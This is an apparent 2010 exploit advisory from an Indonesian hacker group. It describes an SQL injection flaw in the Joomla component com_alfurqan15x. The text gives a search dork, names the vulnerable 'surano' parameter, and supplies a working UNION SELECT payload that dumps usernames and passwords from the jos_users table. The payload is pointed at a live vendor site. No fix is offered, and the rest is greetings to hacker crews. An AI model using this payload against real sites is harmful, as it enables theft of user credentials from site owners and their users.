############################################################################################################# ## Joomla Component com_alfurqan15x SQL injection ## ## Author : kaMtiEz (kamtiez@indonesiancoder.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : 16 Nov, 2010 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://islamis4u.co.cc/ [+] Download : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5 [+] version : 2.2 or lower maybe also affected [+] Tested On : LocalHost [+] Vulnerability : SQL [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs] [ DEMO ] http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users-- [ FIX ] dunno :"> ############################################################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM MainHack MAGELANG CYBER ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW IH-CREW [+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot,Jack-,Hakz,pl4nkt0n,Hmei7 [+] Contrex,YadoY666,bumble_be,MarahMeraH,newbie_043,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck,k4mpret0 [+] Coracore,Gh4mb4s,Jack-,vYcOd,ayy,otong,CS-31,yur4kh4,MISTERFRIBO,GENI212,anharku,isarock,RyanAby [ NOTE ] [+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM [+] Selamat Iedul Adha ;) [+] pondok buncit @ dejavuNet , ngebir is numero uno [+] sendiri di malam hari sambil merokok menanti indahnya pagi ;) [+] turut berduka atas musibah di negaraku .. :(( [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..